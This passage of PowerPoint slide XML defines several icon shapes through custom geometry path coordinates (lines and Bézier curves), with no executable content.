                  <a:pt x="0" y="18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="20282"/>
                  <a:pt x="1813" y="21600"/>
                  <a:pt x="4050" y="21600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17550" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19787" y="21600"/>
                  <a:pt x="21600" y="20282"/>
                  <a:pt x="21600" y="18655"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21600" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="7210"/>
                  <a:pt x="19787" y="5891"/>
                  <a:pt x="17550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0" name="Shape 2770"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7305385" y="50157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1" name="Shape 2771"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7838646" y="50157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8836"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="15812" y="8836"/>
                  <a:pt x="16691" y="9716"/>
                  <a:pt x="16691" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="11884"/>
                  <a:pt x="15812" y="12764"/>
                  <a:pt x="14727" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13643" y="12764"/>
                  <a:pt x="12764" y="11884"/>
                  <a:pt x="12764" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12764" y="9716"/>
                  <a:pt x="13643" y="8836"/>
                  <a:pt x="14727" y="8836"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="14727" y="13745"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16354" y="13745"/>
                  <a:pt x="17673" y="12427"/>
                  <a:pt x="17673" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="9174"/>
                  <a:pt x="16354" y="7855"/>
                  <a:pt x="14727" y="7855"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13100" y="7855"/>
                  <a:pt x="11782" y="9174"/>
                  <a:pt x="11782" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="12427"/>
                  <a:pt x="13100" y="13745"/>
                  <a:pt x="14727" y="13745"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="6873" y="7308"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8442" y="9818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5304" y="9818"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5304" y="9818"/>
                  <a:pt x="6873" y="7308"/>
                  <a:pt x="6873" y="7308"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4418" y="10800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9327" y="10800"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9598" y="10800"/>
                  <a:pt x="9818" y="10580"/>
                  <a:pt x="9818" y="10309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="10208"/>
                  <a:pt x="9780" y="10120"/>
                  <a:pt x="9728" y="10042"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9736" y="10037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7281" y="6110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7274" y="6114"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7186" y="5983"/>
                  <a:pt x="7043" y="5891"/>
                  <a:pt x="6873" y="5891"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6702" y="5891"/>
                  <a:pt x="6560" y="5983"/>
                  <a:pt x="6472" y="6114"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6464" y="6110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4010" y="10037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4018" y="10042"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3965" y="10120"/>
                  <a:pt x="3927" y="10208"/>
                  <a:pt x="3927" y="10309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3927" y="10580"/>
                  <a:pt x="4147" y="10800"/>
                  <a:pt x="4418" y="10800"/>
                </a:cubicBezTo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2" name="Shape 2772"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8371907" y="50157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4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7" y="21545"/>
                  <a:pt x="13610" y="21600"/>
                  <a:pt x="13745" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14016" y="21600"/>
                  <a:pt x="14236" y="21380"/>
                  <a:pt x="14236" y="21109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14236" y="20974"/>
                  <a:pt x="14181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2273" y="12764"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17182" y="12764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17453" y="12764"/>
                  <a:pt x="17673" y="12544"/>
                  <a:pt x="17673" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="12002"/>
                  <a:pt x="17453" y="11782"/>
                  <a:pt x="17182" y="11782"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12273" y="11782"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12002" y="11782"/>
                  <a:pt x="11782" y="12002"/>
                  <a:pt x="11782" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="12544"/>
                  <a:pt x="12002" y="12764"/>
                  <a:pt x="12273" y="12764"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="4909" y="6873"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8836" y="6873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8836" y="11782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4909" y="11782"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4909" y="11782"/>
                  <a:pt x="4909" y="6873"/>
                  <a:pt x="4909" y="6873"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4909" y="12764"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8836" y="12764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9378" y="12764"/>
                  <a:pt x="9818" y="12325"/>
                  <a:pt x="9818" y="11782"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9818" y="6873"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="6331"/>
                  <a:pt x="9378" y="5891"/>
                  <a:pt x="8836" y="5891"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4909" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4367" y="5891"/>
                  <a:pt x="3927" y="6331"/>
                  <a:pt x="3927" y="6873"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3927" y="11782"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3927" y="12325"/>
                  <a:pt x="4367" y="12764"/>
                  <a:pt x="4909" y="12764"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="12273" y="10800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14236" y="10800"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14507" y="10800"/>
                  <a:pt x="14727" y="10580"/>
                  <a:pt x="14727" y="10309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="10038"/>
                  <a:pt x="14507" y="9818"/>
                  <a:pt x="14236" y="9818"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12273" y="9818"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12002" y="9818"/>
                  <a:pt x="11782" y="10038"/>
                  <a:pt x="11782" y="10309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="10580"/>
                  <a:pt x="12002" y="10800"/>
                  <a:pt x="12273" y="10800"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="12273" y="6873"/>
                </a:move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lnTo>
                  <a:pt x="12273" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12002" y="5891"/>
                  <a:pt x="11782" y="6111"/>
                  <a:pt x="11782" y="6382"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="6653"/>
                  <a:pt x="12002" y="6873"/>
                  <a:pt x="12273" y="6873"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="12273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12273" y="7855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12002" y="7855"/>
                  <a:pt x="11782" y="8075"/>
                  <a:pt x="11782" y="8345"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="8617"/>
                  <a:pt x="12002" y="8836"/>
                  <a:pt x="12273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3" name="Shape 2773"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905168" y="50157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8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40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40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2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8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4909" y="12764"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5180" y="12764"/>
                  <a:pt x="5400" y="12544"/>
                  <a:pt x="5400" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="9290"/>
                  <a:pt x="7818" y="6873"/>
                  <a:pt x="10800" y="6873"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13782" y="6873"/>
                  <a:pt x="16200" y="9290"/>
                  <a:pt x="16200" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16200" y="12544"/>
                  <a:pt x="16420" y="12764"/>
                  <a:pt x="16691" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16962" y="12764"/>
                  <a:pt x="17182" y="12544"/>
                  <a:pt x="17182" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17182" y="8748"/>
                  <a:pt x="14325" y="5891"/>
                  <a:pt x="10800" y="5891"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7275" y="5891"/>
                  <a:pt x="4418" y="8748"/>
                  <a:pt x="4418" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4418" y="12544"/>
                  <a:pt x="4638" y="12764"/>
                  <a:pt x="4909" y="12764"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10800" y="11782"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10529" y="11782"/>
                  <a:pt x="10309" y="12002"/>
                  <a:pt x="10309" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10309" y="12544"/>
                  <a:pt x="10529" y="12764"/>
                  <a:pt x="10800" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11071" y="12764"/>
                  <a:pt x="11291" y="12544"/>
                  <a:pt x="11291" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11291" y="12002"/>
                  <a:pt x="11071" y="11782"/>
                  <a:pt x="10800" y="11782"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10800" y="8836"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="8903" y="8836"/>
                  <a:pt x="7364" y="10375"/>
                  <a:pt x="7364" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7364" y="12544"/>
                  <a:pt x="7583" y="12764"/>
                  <a:pt x="7855" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8126" y="12764"/>
                  <a:pt x="8345" y="12544"/>
                  <a:pt x="8345" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8345" y="10917"/>
                  <a:pt x="9444" y="9818"/>
                  <a:pt x="10800" y="9818"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12156" y="9818"/>
                  <a:pt x="13255" y="10917"/>
                  <a:pt x="13255" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13255" y="12544"/>
                  <a:pt x="13474" y="12764"/>
                  <a:pt x="13745" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14017" y="12764"/>
                  <a:pt x="14236" y="12544"/>
                  <a:pt x="14236" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14236" y="10375"/>
                  <a:pt x="12698" y="8836"/>
                  <a:pt x="108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4" name="Shape 2774"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9438429" y="501578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945"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="982" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="982" y="1964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20618" y="1964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="1964"/>
                  <a:pt x="20618" y="2945"/>
                  <a:pt x="20618" y="2945"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19636" y="15709"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1964" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1964" y="3927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19636" y="3927"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19636" y="3927"/>
                  <a:pt x="19636" y="15709"/>
                  <a:pt x="19636" y="15709"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20618" y="982"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11782" y="982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="440"/>
                  <a:pt x="11342" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10257" y="0"/>
                  <a:pt x="9818" y="440"/>
                  <a:pt x="9818" y="982"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="982" y="982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="439" y="982"/>
                  <a:pt x="0" y="1422"/>
                  <a:pt x="0" y="1964"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="2945"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="3488"/>
                  <a:pt x="439" y="3927"/>
                  <a:pt x="982" y="3927"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="982" y="15709"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="16252"/>
                  <a:pt x="1421" y="16691"/>
                  <a:pt x="1964" y="16691"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10309" y="16691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10309" y="17960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7507" y="20762"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7419" y="20851"/>
                  <a:pt x="7364" y="20974"/>
                  <a:pt x="7364" y="21109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7364" y="21380"/>
                  <a:pt x="7583" y="21600"/>
                  <a:pt x="7855" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7990" y="21600"/>
                  <a:pt x="8113" y="21545"/>
                  <a:pt x="8202" y="21456"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10800" y="18858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13398" y="21456"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13488" y="21545"/>
                  <a:pt x="13610" y="21600"/>
                  <a:pt x="13745" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14017" y="21600"/>
                  <a:pt x="14236" y="21380"/>
                  <a:pt x="14236" y="21109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14236" y="20974"/>
                  <a:pt x="14182" y="20851"/>
                  <a:pt x="14093" y="20762"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11291" y="17960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11291" y="16691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19636" y="16691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20178" y="16691"/>
                  <a:pt x="20618" y="16252"/>
                  <a:pt x="20618" y="15709"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20618" y="3927"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21160" y="3927"/>
                  <a:pt x="21600" y="3488"/>
                  <a:pt x="21600" y="2945"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21600" y="1964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="1422"/>
                  <a:pt x="21160" y="982"/>
                  <a:pt x="20618" y="982"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="16200" y="5891"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16471" y="5891"/>
                  <a:pt x="16691" y="6111"/>
                  <a:pt x="16691" y="6382"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="6653"/>
                  <a:pt x="16471" y="6873"/>
                  <a:pt x="16200" y="6873"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15929" y="6873"/>
                  <a:pt x="15709" y="6653"/>
                  <a:pt x="15709" y="6382"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="6111"/>
                  <a:pt x="15929" y="5891"/>
                  <a:pt x="16200" y="5891"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="16200" y="7855"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="17013" y="7855"/>
                  <a:pt x="17673" y="7196"/>
                  <a:pt x="17673" y="6382"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="5569"/>
                  <a:pt x="17013" y="4909"/>
                  <a:pt x="16200" y="4909"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15387" y="4909"/>
                  <a:pt x="14727" y="5569"/>
                  <a:pt x="14727" y="6382"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="7196"/>
                  <a:pt x="15387" y="7855"/>
                  <a:pt x="16200" y="7855"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="8422" y="8135"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11926" y="11638"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12015" y="11727"/>
                  <a:pt x="12138" y="11782"/>
                  <a:pt x="12273" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12408" y="11782"/>
                  <a:pt x="12531" y="11727"/>
                  <a:pt x="12620" y="11638"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14183" y="10075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16200" y="12764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5336" y="12764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5336" y="12764"/>
                  <a:pt x="8422" y="8135"/>
                  <a:pt x="8422" y="8135"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4418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cubicBezTo>
                  <a:pt x="17673" y="13144"/>
                  <a:pt x="17630" y="13047"/>
                  <a:pt x="17568" y="12965"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17575" y="12960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14629" y="9033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14622" y="9038"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14533" y="8919"/>
                  <a:pt x="14397" y="8836"/>
                  <a:pt x="14236" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14101" y="8836"/>
                  <a:pt x="13978" y="8891"/>
                  <a:pt x="13889" y="8980"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12273" y="10597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8693" y="7017"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8604" y="6928"/>
                  <a:pt x="8481" y="6873"/>
                  <a:pt x="8345" y="6873"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8175" y="6873"/>
                  <a:pt x="8033" y="6965"/>
                  <a:pt x="7945" y="7097"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7937" y="7091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4010" y="12982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4017" y="12988"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3965" y="13066"/>
                  <a:pt x="3927" y="13154"/>
                  <a:pt x="3927" y="13255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3927" y="13526"/>
                  <a:pt x="4147" y="13745"/>
                  <a:pt x="4418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5" name="Shape 2775"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9971691" y="5060225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755"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1866" y="6075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10800" y="1395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19735" y="6075"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19735" y="6075"/>
                  <a:pt x="10800" y="10755"/>
                  <a:pt x="10800" y="10755"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18031" y="17315"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14834" y="16216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14832" y="16229"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14797" y="16218"/>
                  <a:pt x="14765" y="16200"/>
                  <a:pt x="14727" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14627" y="16200"/>
                  <a:pt x="14538" y="16251"/>
                  <a:pt x="14460" y="16324"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14455" y="16313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10820" y="20061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7658" y="16334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7653" y="16344"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7571" y="16259"/>
                  <a:pt x="7474" y="16200"/>
                  <a:pt x="7364" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7327" y="16200"/>
                  <a:pt x="7294" y="16218"/>
                  <a:pt x="7259" y="16229"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7257" y="16216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013" y="17331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4767" y="9035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10589" y="12084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10591" y="12080"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10655" y="12122"/>
                  <a:pt x="10724" y="12150"/>
                  <a:pt x="10800" y="12150"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10876" y="12150"/>
                  <a:pt x="10946" y="12122"/>
                  <a:pt x="11009" y="12080"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11011" y="12084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16897" y="9001"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16897" y="9001"/>
                  <a:pt x="18031" y="17315"/>
                  <a:pt x="18031" y="17315"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="21600" y="6075"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="5806"/>
                  <a:pt x="21484" y="5579"/>
                  <a:pt x="21319" y="5470"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21320" y="5466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21306" y="5458"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21301" y="5455"/>
                  <a:pt x="21296" y="5453"/>
                  <a:pt x="21292" y="5451"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11011" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11009" y="70"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10946" y="28"/>
                  <a:pt x="10876" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10724" y="0"/>
                  <a:pt x="10655" y="28"/>
                  <a:pt x="10591" y="70"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10589" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="309" y="5451"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="304" y="5453"/>
                  <a:pt x="299" y="5455"/>
                  <a:pt x="295" y="5458"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="280" y="5466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="281" y="5470"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="5579"/>
                  <a:pt x="0" y="5806"/>
                  <a:pt x="0" y="6075"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="6344"/>
                  <a:pt x="116" y="6571"/>
                  <a:pt x="281" y="6680"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="280" y="6684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295" y="6692"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="299" y="6695"/>
                  <a:pt x="304" y="6697"/>
                  <a:pt x="309" y="6699"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1230" y="7182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="608" y="13603"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="251" y="13805"/>
                  <a:pt x="0" y="14287"/>
                  <a:pt x="0" y="14850"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15596"/>
                  <a:pt x="439" y="16200"/>
                  <a:pt x="982" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1524" y="16200"/>
                  <a:pt x="1964" y="15596"/>
                  <a:pt x="1964" y="14850"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1964" y="14416"/>
                  <a:pt x="1812" y="14034"/>
                  <a:pt x="1580" y="13787"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2173" y="7676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3822" y="8540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2950" y="18135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2958" y="18138"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2955" y="18167"/>
                  <a:pt x="2945" y="1819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cubicBezTo>
                  <a:pt x="3474" y="18900"/>
                  <a:pt x="3506" y="18884"/>
                  <a:pt x="3541" y="18873"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3543" y="18884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7238" y="17613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10506" y="21465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10510" y="21456"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10593" y="21541"/>
                  <a:pt x="10690" y="21600"/>
                  <a:pt x="10800" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10901" y="21600"/>
                  <a:pt x="10989" y="21548"/>
                  <a:pt x="11068" y="21476"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11072" y="21487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14834" y="17607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18548" y="18884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18550" y="18871"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18585" y="18882"/>
                  <a:pt x="18618" y="18900"/>
                  <a:pt x="18655" y="18900"/>
